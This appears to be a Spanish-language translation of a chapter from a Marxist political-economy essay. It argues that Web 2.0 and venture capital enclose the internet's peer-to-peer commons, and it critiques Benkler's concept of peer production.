El socialismo y todos los demás movimientos de “la izquierda”, comienzan en este conflicto de clase. La creencia de que los medios de producción deben ser propiedad de los productores ya era común entre los socialistas de la época, notablemente entre los que apoyaban al reformista social Robert Owen y el movimiento cooperativista a principios del 1800. Esta comprensión de clase, basada en la relación con los medios de producción, como capitalistas, terratenientes y trabajadores, antes que categorías como rico y pobre, noble, clero y campesino, proveyó una sólida base intelectual que permitió que emergiera un socialismo más científico desde esas raíces utópicas.

La renta permite a los dueños de la propiedad escasa llevar a los trabajadores desposeídos al nivel de subsistencia. Como lo explica Ricardo, “el precio natural del trabajo es aquel que es necesario para permitir a los trabajadores, uno tras otro, subsistir y perpetuar su raza” (Ricardo, 1821). A veces se proclama que esto puede ser refutado por la diferencia entre el precio “natural” teórico y el precio del trabajo en el mercado real, pero tal argumento es simplemente una equivocación, explica Ricardo, porque el precio del mercado fluctúa. La subsistencia no puede tomarse como el mínimo indispensable que requiere la supervivencia y la reproducción. Aun en tiempos de Ricardo, muchos trabajadores no estaban en posición de morirse si ganaban un centavo menos. Antes bien los trabajadores, por su propia definición, son incapaces de ganar lo suficiente para hacer algo más que vivir y luchar por vivir de acuerdo a los estándares aceptables de su comunidad.

Estos “estándares aceptables” se establecen en términos canónicos de gusto y decencia establecidos por una elite económica depredadora.

Thorstein Veblen, un economista y sociólogo noruego-estadounidense cuyo trabajo dispone las bases del movimiento institucionalista económico, argumenta que, en una sociedad de clases, todos excepto los más ricos se ven compelidos a disponer prácticamente de su ganancia completa para vivir de acuerdo a los estándares comunitarios de respetabilidad, en lo que él llama “consumo conspicuo” y “derroche conspicuo”. No participar en el consumo conspicuo significa enfrentarse a la exclusión social y aun más reducir los prospectos de movilidad ascendente (Thorstein, 2010). “Fracasar en consumir en cantidad y calidad debida se convierte en una marca de inferioridad y desmerecimiento”, argumenta Veblen en La teoría de clase ociosa, de 1889 (Thorstein, 2010).

Los trabajadores tienen algo más que fuerzas culturales trabajando contra su habilidad de formar capital a través de los ingresos que retuvieran más allá de la subsistencia. Mientras los trabajadores carezcan de propiedad, cualquier aumento salarial que ganen será barrido por la inflación de los precios, muy a menudo como resultado del crecimiento de la competencia monetaria por ubicaciones y el incremento de la renta sobre la tierra. Esto no es ningún secreto para los negociadores capitalistas y sus colaboradores en el sector público. Reducir los salarios reales por la inflación como alternativa a la reducción salarial funciona por la “ilusión del dinero”. Como escribe John Maynard Keynes, tal vez el economista más importante de su tiempo y el fundador de la “macroeconomía” moderna, en su libro de 1936 La teoría general del empleo, el interés y el dinero, “a veces se dice que sería ilógico que los trabajadores resistan una reducción del salario monetario pero no lo hagan frente a una reducción del salario real […] la experiencia demuestra que de hecho es de esta manera como se comporta la mano de obra” (Keynes, 2002). Daniel Bell pone en claro este proceso en su paper “La subversión de la negociación colectiva”. Bell muestra que estos casos no llevan a un cambio en el nivel general de la riqueza real; en la mayoría de los casos, los trabajadores que recibieron un aumento salarial no incrementaron su parte de la riqueza, sino que terminaron pagando precios más altos (Bell, 1960).

La propiedad no es un fenómeno natural; la propiedad es creada por ley. La habilidad para extraer renta depende de la habilidad propia para controlar un recursos escaso aun si es utilizado por alguien más. En otras palabras, la propiedad le da la capacidad al propietario de forzar a esa otra persona a compartir el producto de su trabajo. La propiedad, entonces, es el control a distancia. De esta manera, la renta sólo es posible mientras sea apoyada por la fuerza, felizmente provista por el Estado a los dueños de la propiedad.

Sin un medio para forzar a aquellos que ponen la propiedad en uso productivo a compartir el producto de su trabajo con el dueño ausente y ocioso, ese propietario no podría ganarse la vida, y menos acumular más propiedad. Como diría el revolucionario marxista alemán Ernest Mandel en su “El materialismo histórico y el Estado capitalista”, “sin la violencia del estado capitalista, no hay capitalismo seguro” (Mandel, 1981). El propósito de la propiedad es asegurar que la clase desapropiada exista para producir riqueza disfrutada por la clase propietaria. La institución de la propiedad no beneficia a los trabajadores. Esto no es lo mismo que decir que los trabajadores individuales no puedan convertirse en propietarios, sino que al hacerlo dejan de pertenecer a su clase. Las historias de éxito individual no cambian el sistema de clases. Como dijo el filósofo político canadiense Gerald Cohen, proponente del marxismo analítico, “quiero elevarme con mi clase, ¡no sobre ella!” (Cohen, 1988, 2009)

La situación global actual confirma que los trabajadores, como clase, no son capaces de acumular propiedad. Un estudio hecho en la Universidad de las Naciones Unidas por el Instituto Mundial de Investigación sobre la Economía del Desarrollo reporta que el 1% de los adultos más ricos poseía el 40% de los bienes globales en el año 2000, y que el 10% más rico de los adultos contabilizada el 85% del total mundial. La mitad inferior de la población adulta poseía apenas el 1% de la riqueza global. En el reporte se incluyen estadísticas extensivas, muchas de las cuales indican una disparidad mundial creciente (Development Economics Research, 2007).

La condición de la clase trabajadora en la sociedad es por lejos de carencia de poder y pobreza; la condición de la clase trabajadora en Internet no es diferente. Los requisitos de control y privilegio requeridos por el capitalismo están siendo impuestos en la Internet, cambiando la topología de la red de una donde el comunismo de pares está embebido en su arquitectura, a otra donde las aplicaciones cliente-servidor se han vuelto centrales y cada vez más median y controlan todas las relaciones.

Atrapados en la telaraña mundial

Las posibilidades revolucionarias de la Internet temprana descansaban particularmente sobre la capacidad de interactuar directamente entre usuarios. Así, la Internet prometía ser una plataforma donde la libertad de expresión y de asociación estaba construida en la arquitectura misma. Sin embargo, sin que la mayoría de los usuarios lo noten, la arquitectura de Internet está cambiando, y la topología de la red está siendo reconstruida de forma tal que no sólo sirve a los intereses del capitalismo, sino que también habilita el monitoreo y control de sus usuarios en una escala jamás soñada.

Internet tomó al mundo corporativo por sorpresa, al emerger de universidades públicas, investigación militar y la sociedad civil. Fue promovida por una industria casera de proveedores de Internet pequeños e independientes, que eran capaces de ganarse unos pesos al proveer acceso a la red construida y financiada por el Estado. Mientras tanto, el mundo corporativo pujaba por una idea muy diferente sobre la supercarretera de la información, produciendo “servicios online” monolíticos y centralizados como CompuServe, Prodigy y AOL. Lo que hizo a estos servicios corporativos diferentes de Internet fue que eran servicios centralizados a los que los usuarios se conectaban directamente, mientras que la Internet es una red de pares (P2P) donde cada dispositivo podía comunicarse directamente con cualquier otro con sólo poseer una dirección pública de Internet.

Mientras los usuarios tanto de CompuServe como de Internet tenían acceso a aplicaciones similares, como el correo electrónico, grupos de discusión, grupos de conversación y compartición de archivos, los usuarios de CompuServe dependían completamente del acceso a este, mientras que los usuarios de Internet podían tener acceso a esta a través de cualquier proveedor de servicio e incluso podían tener sus propios servidores. Las plataformas como el correo electrónico y el IRC se basaban en una estructura distribuida a la que nadie controlaba y de la que nadie era dueño. Esta estructura era aceptada por sus adoptantes tempranos más entusiastas, como las instituciones públicas y las organizaciones no gubernamentales. No obstante, los inversores capitalistas eran incapaces de ver cómo un sistema irrestricto les permitiría percibir ganancias. La Internet parecía el anatema de la imaginación capitalista.

El boom de las puntocom original, entonces, se caracterizó por un apuro por poseer infraestructura, consolidar a los proveedores de Internet independientes y tomar el control de la red. El dinero fue tirado al azar por los inversores mientras luchaban por comprender cómo podría ser utilizado este medio. En última instancia, la misión de estos inversores fue largamente exitosa. Su misión fue destruir a los proveedores de servicio independientes y poner grandes y bien financiadas corporaciones en el asiento del conductor. Si tenías una cuenta de Internet en 1996 lo más probable es que haya sido con una empresa local pequeña. Diez años después, mientras algunas de esas compañías sobrevivieron, la mayoría de las personas tenían acceso a Internet a través de corporaciones de telecomunicaciones gigantescas, que persisten incluso más fuertes hoy.

La Internet es más que la Web, término inexacto usado como un sinónimo de la red entera y de todas las aplicaciones que corren en ella. La WWW es una tecnología que corre sobre la red de pares que es la Internet; sin embargo, no es como las tecnologías clásicas de Internet como el correo, IRC, Usenet, etc. La Web no es distribuida ni es P2P; es una tecnología cliente-servidor. El que publica un sitio web corre los servidores y tiene control exclusivo sobre el contenido y las aplicaciones que el sitio provee, incluyendo el control de quién debe o no debe tener acceso al sitio. Un sitio web tiene más en común con CompuServe que con un sistema de pares. El que publica tiene control absoluto sobre el contenido y las opciones disponibles a los usuarios.

La Web comenzó inocentemente como una plataforma para publicar texto en línea; no obstante, se convirtió rápidamente en el punto focal de las organizaciones que buscaban comercializar la Internet. Desde sus modestos inicios, cuando las compañías ponían volantes en lína, la Web comercial despegó junto con el desarrollo del e-Commerce. En este punto, la Web todavía no había tomado la compartición en línea. La gente usaba la Web para, por ejemplo, navegar una librería, pero continuó empleando las tecnologías distribuidas para comunicarse con otros usuarios. Sin embargo, muy pronto la Web, financiada por capitales de riesgo, se colocó de forma tal que los sitios web operados por grandes corporaciones se convirtieron en las principales plataformas sociales. La misma Internet desaparecería pronto detrás de la Web, y los usuarios nunca más saldrían del navegador.

La Web 2.0 emergió como el paraíso del capitalismo de riesgo, donde inversores se meten en el bolsillo el valor producido por usuarios no pagados, se montan en las innovaciones técnicas del movimiento del software libre y matan el potencial decentralizador de la tecnología de pares.

Web 2.0, un término acuñado por O’Reilly Media en el 2004, se refiere a la supuesta segunda generación de servicios basados en Internet, como los sitios de redes sociales, wikis, foros, blogs herramientas de comunicación y folksonomías que enfatizan la colaboración en línea y la compartición entre usuarios.

(Wikipedia.org, 2010).

El uso de la palabra “supuesta” es digna de notarse. Wikipedia, debería saberlo, siendo el más amplio trabajo colectivamente editado de la historia. Al contrario de la mayoría de los miembros de la generación 2.0, Wikipedia es controlada por una fundación sin fines de lucro, obtiene ingresos sólo por donación y lanza su contenido bajo una licencia copyleft. Dice mucho que el artículo en la Wikipedia continúa con: “[La Web 2.0] se ha vuelto una (aunque mal definida y a menudo criticada) palabra de moda [buzzword] popular entre ciertas comunidades técnicas y de marketing”.

La comunidad del software libre ha tendido a sospechar, si no a desdeñar del todo, a la moda 2.0. Tim Berners-Lee, el creador de la World Wide Web, desechó el término diciendo que “la Web 2.0 es por supuesto una pieza de argot, nadie sabe realmente qué significa”. Continua diciendo que “significa usar los estándares que fueron producidos por todas estas personas que traban en la Web 1.0” (developerWorks, 2006). En realidad, entonces, no hay ni una Web 1.0 ni una 2.0. Hay solo un desarrollo continuo de aplicaciones en línea que no puede dividirse claramente.

Al tratar de definir a la Web 2.0, es seguro decir que la mayoría de los desarrollos importantes estuvieron orientados a habilitar a la comundiad a crear, modificar y compartir contenido de una forma que antes sólo había estado disponible para organizaciones centralizadas que compraban paquetes de software costosos, pagaban un equipo para manejar los aspectos técnicos del sitio, y pagaban un equipo para crear el contenido que generalmente era publicado solo en el sitio de esa organización.

Una compañía de la Web 2.0 cambia fundamentalmente la producción del contenido en Internet. Las aplicaciones web y los servicios se han vuelto más baratos y rápidos de implementar, y al permitir a los usuarios finales acceder a estas aplicaciones, una compañía podía tercerizar efectivamente la creación y la organización de su contenido a los mismísimos usuarios finales. En lugar del modelo tradicional de un proveedor de contenidos editando su propio contenido y de un usuario final consumiéndolo, el nuevo modelo permite al sitio de la compañía a actuar como un portal centralizado de usuarios que son a la vez consumidores y creadores. Para el usuario, el acceso a estas aplicaciones lo empodera a crear y publicar contenido que previamente les hubiera requerido comprar como software de escritorio y poseer una mayor serie de habilidades tecnológicas. Por ejemplo, dos de los medios primarios de producción de contenidos basados en texto en la Web 2.0 son los blogs y los wikis. Estos permiten al usuario crear y publicar contenido directamente desde su navegador sin un conocimiento real de lenguajes de marcado, transferencia de archivos o herramientas de sindicación, y todo sin necesidad de comprar software.

El uso de aplicaciones web para reemplazar el software de escritorio es mucho más significativo para el usuario cuando se trata del contenido que no es meramente textual. No sólo las páginas web pueden ser creadas y editadas en el navegador sin tener que comprar software de edición HTML, las fotografías pueden ser cargadas y manipuladas en línea sin costosas aplicaciones de escritorio para manipulación de imágenes. Un video hecho en la cámara de un consumidor puede enviarse a un sitio de videos, subida, codificada y embebida en una página HTML, publicada, etiquetada y sindicalizada a través de la web sin dejar el navegador. En el artículo de Paul Graham sobre la Web 2.0 él diferencia los roles de la comunidad/usuario más específicamente. Esto incluye al profesional, al amateur y al usuario (más precisamente, al usuario final). Los roles del profesional y el usuario eran, siguiendo a Graham, bien entendidos en la Web 1.0, pero el amateur no tenía un lugar bien definido (Graham, 2005b). Como Graham describe en “Qué pueden aprender los negocios del Código Abierto”, el amateur ama trabajar, sin preocuparse por compensación o reconocimiento alguno por su trabajo. En desarrollo, el amateur contribuye al software de código abierto mientras que el profesional es pagado por su trabajo propietario (Graham, 2005a).

La caracterización que hace Graham del “amateur” tiene una extraña semejanza a Si tuviera un circo, de Dr. Seuss, donde el joven Morris McGurk dice al staff del imaginario Circo McGurkus:

Mis obreros aman trabajar.
Dicen, “¡Trabájanos! ¡Por favor hazlo!
Trabajaremos y trabajaremos tantas sorpresas
¡Que nunca verías la mitad si tuvieras cuarenta ojos!”.

(Seuss, 1956)

Y mientras el término “Web 2.0” puede no significar nada para Tim Berners-Lee, quien ve a las innovaciones recientes como nada más que un desarrollo continuado de la Web, para los capitalistas de riesgo, que como Morris McGurk sueñan con trabajadores incansables produciendo contenidos infinitos sin demandar un salario, suena estupendo. Y en efecto, de YouTube a Flickr a Wikipedia, verdaderamente “no verías la mitad si tuvieras cuarentas ojos”. Tim Berners-Lee tiene razón. No hay nada, desde un punto de vista técnico o del usuario en la Web 2.0 que no tenga sus raíces en, y no sea un desarrollo natural de, la generación temprana de la Web. La tecnología asociada con la bandera de la Web 2.0 era posible y en algunos casos estaba previamente disponible, pero la moda alrededor de este uso ciertamente ha afectado el crecimiento de los sitios 2.0.

Internet siempre ha sido sobre compartir entre usuarios. En efecto Usenet, el sistema de mensajería distribuida, ha estado operando desde 1979. Desde entonces, Usenet ha estado almacenando discusiones, periodismo “amateur” y compartición de fotos y archivos. Como la Internet, es un sistema distribuido no apropiado ni controlado por nadie. Es esta cualidad, la falta de control y apropiación central, la que diferencia servicios como Usenet de la Web 2.0.

Si Web 2.0 significa algo, este significado descansa sobre la racionalidad del capital de riesgo. La Web 2.0 representa el retorno de la inversión en emprendimientos de Internet. Despúes de la decadencia puntocom (el fin real de la Web 1.0), aquellos que buscaban inversiones en dólares necesitaban una nueva razón para invertir en emprendimientos en línea. “Constrúyelo y ellos vendrán”, la actitud dominante del boom puntocom de los ’90, junto con la delirante “nueva economía” ya no eran atractivos despúes de que tantos emprendimientos fallaran. Construir infraestructura y financiar la capitalización real ya no era lo que los inversores buscaban. Capturar el valor creado por otros, sin embargo, probó ser una propuesta más atractiva.

La Web 2.0 es el Boom de la Inversión en Internet 2.0. La Web 2.0 es un modelo de negocio de apropiación privada del valor creado colectivamente. Nadie niega que la tecnología de sitios como YouTube, por ejemplo, es trivial. Esto está más que evidenciado por el gran número de servicios idénticos, tales como Daily Motion, de compartición de videos. El valor real de YouTube no es creado por los desarrolladores del sitio; en cambio, es creado por la gente que carga videos en el sitio. Aun así, cuando YouTube fue comprado por un valor de mil millones de dólares en acciones de Google, ¿cuántas de esas acciones fueron adquiridas por los que hicieron esos videos? Cero. Zilch. Nothing. Un gran negocio, entonces, si sos el dueño de una compañía de la Web 2.0.

El valor producido por los usuarios de servicios de la Web 2.0 como YouTube es capturado por los capitalistas de riesgo. En algunos casos, el contenido que contribuyen se convierte en última instancia en propiedad de los dueños del sitio. La apropiación privada del valor creado comunitariamente es una traición a la promesa de compartir tecnología y la co-operación libre. Al contrario de la era de las puntocom, donde los inversores a menudo financiaban adquisición de capitales costosos, desarrollo de software y creación de contenido, un inversor en la Web 2.0 financia el marketing, la generación de moda y tendencias. La infraestructura está ampliamente disponible a bajo costo, el contenido es gratis y el costo del software, al menos el software que no está disponible libremente, es diminuto. Básicamente, al proveer algo de ancho de banda y espacio en disco, es posible convertirse en un sitio 2.0 exitoso si puedes publicitarte efectivamente.

El principal triunfo de una compañía de la Web 2.0, entonces, viene de su relación con la comunidad. Más específicamente, el éxito viene de la capacidad de la compañía para “aprovechar la inteligencia colectiva”, como dice Tim O’Reilly (O’Reilly, 2007). Desde esta perspectiva, las compañías de la Web 1.0 eran demasiado monolíticas y unilaterales en su acercamiento al contenido. Las historias de éxito en la transición de la Web 1.0 a 2.0 se basaron en su habilidad para mantenerse monolíticas en cuanto a la marca del contenido, o, mejor aun, en su apropiación del contenido, al mismo tiempo que abrían la creación de ese contenido a la comunidad. Yahoo!, por ejemplo, creó un portal con contenido de la comunidad mientras se mantenía como la ubicación centralizada para encontrarlo. eBay permite que la comunidad venda sus bienes al tiempo que es dueño del mercado para esos bienes. Amazon, aun vendiendo los mismos productos que otros sitios, tuvo éxito al permitir que la comunidad participe en el “flujo” alrededor de sus productos.

Debido a que los capitalistas que invierten en emprendimientos de la Web 2.0 usualmente no financian la capitalización temprana, su comportamiento es marcadamente parasitario. Los capitalistas de la Web 2.0 arriban frecuentemente tarde, cuando la creación de valor está en su mejor momento, se cuelan para apropiarse del espacio y usan su poder financiero para promover el servicio, a menudo en el contexto de una red hegemónica de socios mayores y bien financiados. Esto significa que las compañías que no son adquiridas por el capital de riesgo terminan hambrientas de efectivo y echadas fuera del club.

En todos estos casos, el valor de un sitio de Internet no es creado por el equipo contratado por la compañía que lo posee, sino por los usuarios que lo utilizan. Con el énfasis puesto en el contenido creado por la comunidad y la compartición, es muy fácil pasar por alto preguntas acerca de la propiedad del contenido y la habilidad para monetizar su valor. Estas preguntas son rara vez hechas por el usuario. Son parte de la letra chica en los Términos de Servicio de Facebook, o en el “flickr.com” en la URL de sus fotos. La propiedad rara vez es un problema para la comunidad, y es un pequeño precio a pagar por el uso de esas aplicaciones maravillosas. Ya que la mayoría de los usuarios no tienen acceso a medios alternativos para producir y publicar su propio contenido, son atraídos a sitios como Facebook y Flickr.

Debe agregarse que muchos proyectos de código abierto pueden citarse como las innovaciones clave para el desarrollo de la Web 2.0: software libre como Linux, Apache, PHP, Ruby, Python, etc. son la columna vertebral de la Web 2.0 y de la Web en sí misma. Pero existe una falla fundamental en todos estos proyectos en términos de a lo que O’Reilly refiere como las “competencias principales” de las compañías de la Web 2.0, es decir el control sobre fuentes de datos únicas, difíciles de recrear, enriquecidas por el uso de la gente y el aprovechamiento de la inteligencia colectiva que atraen (O’Reilly, 2007). Permitir a la comunidad contribuir abiertamente y utilizar esa contribución en el contexto de un sistema privativo donde el propietario se adueña del contenido es característico del éxito de una compañía de la Web 2.0. Permitir a la comunidad ser dueño de lo que crea, sin embargo, no lo es.

Entonces, para ser exitoso y crear ganancias para los inversores, una compañía de la Web 2.0 necesita crear mecanismos para compartir y colaborar controlados centralmente. La falta de control central que poseen Usenet y otras tecnologías controladas por pares es, en el contexto de la Web 2.0, una falla fundamental. Solo benefician a sus usuarios, no a los inversores ausentes, porque no son “poseídas”. Así, porque la Web 2.0 está financiada por el viejo capitalismo, Usenet está practicamente olvidada. Mientras YouTube vale mil millones de dólares, PeerCast, una innovadora red de streaming de video P2P que existe desde hace varios años más que YouTube, es virtualmente desconocida.

Desde un punto de vista tecnológico, las tecnologías distribuidas y de pares son muchísimo más eficientes que los sistemas de la Web 2.0. Haciendo un mejor uso de los recursos de la red al utilizar las computadoras y las conexiones de red de los usuarios, el P2P evita los cuellos de botella creados por los sistemas centralizados. Además permite que el contenido sea publicado con menor infraestructura, a menudo no más que una computadora y una conexión a Internet de consumidor final. Los sistemas P2P no requieren los centros de datos masivos de YouTube. Los sistemas distribuidos también tienden a ser más longevos. Usenet ha sido subsumida de alguna forma por Google, que es dueño del archivo de Usenet más grande y del más usado cliente web, Google Groups. Sin embargo, gracias a la naturaleza distribuída de Usenet, otros medios de acceso continuan existiendo en paralelo y mientras su rol como una plataforma online ha perdido prominencia, muchos grupos de noticias permanecen en actividad. Por ejemplo, la Iglesia de los SubGenios, alt.slack, continua teniendo importancia como un foro social para la popular religión de burla con sede en EEUU. La falta de una infraestructura central también conlleva una falta de control central, significando la ausencia de censura, a menudo un problema de la propiedad privada de las “comunidades”, que frecuentemente ceden a los grupos de presión públicos y privados y aplican limitaciones al tipo de contenido que permiten. Además, la falta de grandes bases de datos cruzadas con bases de información sobre los usuarios es una ventaja muy fuerte en términos de privacidad.

Desde esta perspectiva, puede decirse que la Web 2.0 es el ataque preventivo del capitalismo a los sistemas de pares. No obstante, a pesar de las muchas desventajas en comparación al P2P, la Web 2.0 es más atractiva a los inversores y por lo tanto tiene más dinero para financiar y promover soluciones centralizadas. El resultado final es que la inversión capitalista ha fluido hacia las soluciones centralizadas, volviéndolas fáciles y baratas o gratuitas para que los productores no-técnicos de información las adoptasen. Esta facilidad de acceso, comparada a la técnicamente desafiante y costosa empresa de poseer tus propios medios de producción de información, ha creado un proletariado “sin tierra” listo para proveer de trabajo alienado de creación de contenido a los nuevos terratenientes informáticos de la Web 2.0. La misión de la Web 2.0 es destruir el aspecto P2P de la Internet y hacerte junto con tu computadora y tu conexión a Internet, dependiente de la conexión a servicios centralizados que controlan tu habilidad para comunicarte. La Web 2.0 es la ruina de los sistemas de pares libres y el regreso de los servicios en línea monolíticos.

Un detalle informativo es que la mayoría de las conexiones hogareñas o de oficina durante los ’90, como las conexiones por módem o ISDN, eran simétricas, iguales en su habilidad para enviar y recibir datos. Por diseño, estas conexiones te permitían ser al mismo tiempo un productor y un consumidor de información. Por otro lado, las conexiones DSL y de cable-modem modernas son asimétricas, permitiéndote descargar información rápidamente, pero subirla lentamente. Además, muchos acuerdos de usuario de los servicios de Internet prohíben al usuario correr servidores en sus cuentas de consumidor y podrían cortarte el servicio si lo hacés.

El capitalismo, enraizado en la idea de que la ganancia es percibida a través de la propiedad ociosa, requiere del control centralizado. Sin tal forma de control, los productores no tienen motivo para compartir su ganancia con accionistas ajenos. Asique mientras el financiamiento del desarrollo de Internet provenga de accionistas privados intentando apropiar valor poseyendo recursos de Internet, la red solo podrá volverse más restringida y centralizada. Mientras los bienes comunes informacionales tienen el potencial de tener un rol importante en movilizar a la sociedad hacia modos de producción más inclusivos, cualquier esperanza real por servicios basados en Internet genuinos, enriquecedores de la comunidad, no está enraizada en la creación de más recursos centralizados y privados, sino en la creación de sistemas cooperativos, P2P y basados en los comunes, poseídos por todos y por ninguno.

Para reiterar, aunque pequeña y oscura para los estándares actuales, con su foco puesto en aplicaciones de pares como Usenet y el correo electrónico, la Internet temprana era un recurso común, compartido. La comercialización de Internet y la emergencia del financiamiento capitalista permitieron el cercamiento de estos bienes comunes informacionales, convirtiendo la riqueza pública en beneficio privado. Por lo tanto la Web 2.0 no debe pensarse como una segunda generación del desarrollo técnico ni social de la Internet, sino como la segunda ola de cercamiento capitalista sobre los bienes comunes informacionales.

La tercera ola de cercamiento de los bienes informacionales ya está apareciendo. La computación en la nube, provista por grandes corporaciones como Google y Amazon, donde los clientes no son propietarios de la infraestructura física que utilizan, profundiza la centralización de la infraestructura de la Internet. Adicionalmente, legislaciones como el “Paquete de Reformas de Telecomunicaciones” presentadas al Parlamento Europeo, buscan posibilitar que los proveedores de servicios (grandes conglomerados de telecomunicaciones) puedan decidir a cuáles sitios web pueden acceder sus usuarios. El capital nos está mostrando su visión del futuro de Internet, y el futuro es muy parecido a CompuServe: monolítico, centralizado, mediado, controlable y explotable, y naturalmente, operado por unas pocas grandes corporaciones.

Casi todos los servicios de Internet más utilizados pueden ser reemplazados por alternativas de pares. Google puede reemplazarse por un sistema de búsquedas P2P, donde cada navegador y cada servidor web son nodos activos en el proceso de búsqueda; Flickr y YouTube pueden reemplazarse por PeerCast, eDonkey y BitTorrent, que permiten a los usuarios utilizar sus propias computadoras y conexiones a Internet para compartir videos y fotografías colaborativamente. Sin embargo, desarrollar recursos de Internet requiere aplicación de riquezas, y mientras la fuente de estas sea el capital de riesgo, el gran potencial de pares de la Internet permanecerá irrealizado. Si no podemos encontrar alternativas al financiamiento capitalista, no solo perderemos la Internet como la conocemos, sino también la oportunidad de rehacer la sociedad a la imagen del P2P.

La Producción de Pares y la Pobreza de las Redes

Una Internet más libre no puede existir dentro del actual sistema de financiamiento capitalista. Los argumentos a favor de la evidente superioridad técnica de las tecnologías distribuídas sobre las centralizadas no han sido los factores decisivos en el desarrollo, en última instancia, de nuestra infraestructura de comunicación global, que se ha consolidado como una infraestructura restrictiva y regulada. El factor determinante es, como siempre, el hecho de que aquellos cuyos intereses están asegurados por la restricción de la libertad, tienen más riqueza a su disposición para presionar implacablemente hacia sus fines, que la riqueza disponible para resistirse a ellos. Las razones económicas son bien entendidas; la clase numéricamente pequeña de capitalistas es la beneficiaria de la injusta distribución de los activos productivos que le permite capturar la riqueza producida por las masas de trabajadores sin propiedad.

Si queremos tener voz en la forma en como las redes de comunicaciones se operan, o si queremos hacer cualquier reforma social, debemos comenzar por no permitir que los dueños de la propiedad conviertan nuestra productividad en riqueza acumulada por y para ellos. La riqueza que usan para imponer restricciones a nuestras libertades es la riqueza que nos han quitado. Sin nosotros no tendrían fuente de riqueza. Ni siquiera toda la riqueza acumulada durante siglos de explotación puede salvar a la elite económica si se vuelve incapaz de continuar capturando la riqueza del presente. El valor del futuro es muchísimo mayor que el del pasado. Nuestras ideas sobre topología de redes finalmente no son una amenaza para el capitalismo, que siempre las puede co-optar, sabotear o simplemente ignorar. Antes bien, son nuestras nuevas formas de trabajar y compartir a través de fronteras nacionales las que tienen el potencial de amenazar el orden capitalista y abrir paso a una nueva sociedad.

Con frecuencia, las discusiones sobre las relaciones productivas en los proyectos de software libre y otros proyectos colaborativos como Wikipedia, intentan embotellar la producción basada en los comunes y atraparla dentro de la esfera de la producción inmaterial e intangible, restringiéndola a un dominio en el que no puede afectar la distribución de la riqueza ni por lo tanto desempeñar un papel en el conflicto de clases. Yochai Benkler, profesor de Estudios Legales Empresariales en la Escuela de Leyes de Harvard, acuñó el término “produccion de pares” para describir la forma en que el software libre, los articulos de Wikipedia y otros trabajos similares se producen. Limitando su análisis a la llamada “economía de la información en red”, la novedad de la producción de pares como es entendida por Benkler y muchos otros es que la propiedad en el patrimonio común es “propiedad no rival”, que puede ser consumida sin prevenir a otros consumirla al mismo tiempo. Esta propiedad no rival puede incluir la transmisión radial, el video en Internet o cualquier otro recurso transferible o accesible por red, como el software libre. Tal propiedad carece virtualmente de costos de reproducción. Otra característica distintiva del concepto limitado de producción de pares de Benkler es que no es reciprocitaria, es decir que los productores no reciben remuneración directa por lo que han producido, ya que sus productos están disponibles sin costo. Por ejemplo, a los usuarios de software libre no se les requiere compensar a los desarrolladores originales.

No hay que negar que la red de riqueza de Benkler tiene mucho que ofrecer. El valor de estos comunes informacionales para sus usuarios es fantástico, como evidencian los millones que, por ejemplo, usan software libre, Wikipedia, comunicaciones en línea y herramientas de redes sociales. Sin embargo, si la producción de pares basada en comunes se limita exclusivamente a bienes comunes hechos de propiedad digital sin costo de reproducción, ¿cómo puede el valor de uso producido traducirse en valor de cambio? ¿Dónde está el dinero para pagar la producción de estas cosas valiosas? Algo sin costo de reproducción no puede tener valor de cambio en el contexto del libre intercambio. Cualquiera que quiera una copia puede obtenerla de cualquiera que tenga una. Pero si lo que producen no tiene valor de cambio, ¿cómo pueden los demás pares productores ser capaces de adquirir los bienes materiales necesarios para su subsistencia?

La red de riqueza existe dentro del contexto de un planeta pobre. Las causas de la pobreza no son la falta de cultura e información, sino la explotación directa de la clase productora por las clases dueñas de la propiedad. La fuente de la pobreza no son los costos de reproducción sino la renta económica extraída, la plusvalía capturada al forzar a los productores a aceptar como salario menos que el producto completo de su trabajo, negándoles el acceso independiente a los medios de producción. Mientras la producción basada en los comunes se aplique exclusivamente a los comunes informacionales y el modo de producción capitalista siga dominando la producción de la riqueza material, los dueños de la propiedad material continuarán capturando la riqueza marginal creada como resultado de la productividad de esos comunes informacionales. Cualquiera sea el valor de cambio derivado de los comunes informacionales, será siempre capturado por los dueños de la propiedad real, que se encuentra fuera de los comunes.

Para que la producción de pares tenga algún efecto sobre la riqueza material en general, tiene que operar en el contexto de un sistema completo de bienes y servicios, donde tanto los medios de producción físicos como los virtuales estén disponibles en los comunes productivos. Al establecer una producción de pares únicamente en el contexto del patrimonio común de la informacion, Benkler está creando una trampa, asegurándose que el valor creado en la economía de pares sea apropiado por el privilegio sobre la propiedad. Encontramos a Benkler de cabeza y necesitamos redefinir la producción de pares para volver a colocarlo de pie.

No es la producción lo que es inmaterial en la producción inmaterial no reciprocitaria. Las computadoras, redes, desarrolladores y sus lugares de residencia y trabajo son muy materiales y requieren mantenimiento material. Lo que es inmaterial es la distribución. La información digitalizada, sea código fuente u obra cultural puede multiplicarse y enviarse por las redes globales en fracciones de segundo, aunque su producción sigue siendo un asunto bastante material. Si la produccion de pares sólo puede producir bienes inmateriales como el software y si los productores no obtienen nada a cambio por esa producción, entonces esa forma de “producción” no puede llamarse modo de producción en lo absoluto. En primer término, cualquier modo de producción debe dar cuenta de sus insumos materiales o se desvanecerá. Estos insumos deben incluir los costos de subsistencia de quienes contribuyeron con su trabajo, para, como mínimo, “permitir a los trabajadores, uno con otro, subsistir y perpetuar su raza”, en palabras de Ricardo (Ricardo, 1821).

La producción inmaterial no reciprocitaria no puede hacerlo, ya que para producir software libre, cultura libre o sopa libre, los productores deben obtener su subsistencia de alguna otra fuente y por lo tanto la producción inmaterial no reciprocitaria no es una forma de producción en lo absoluto, sino un caso especial de distribución dentro de otra forma de producción. La producción inmaterial no reciprocitaria no es más modo de producción que una olla popular o la medicina socializada. Se trata simplemente de un fenómeno superestructural que tiene otro modo de producción como base: el capitalismo.

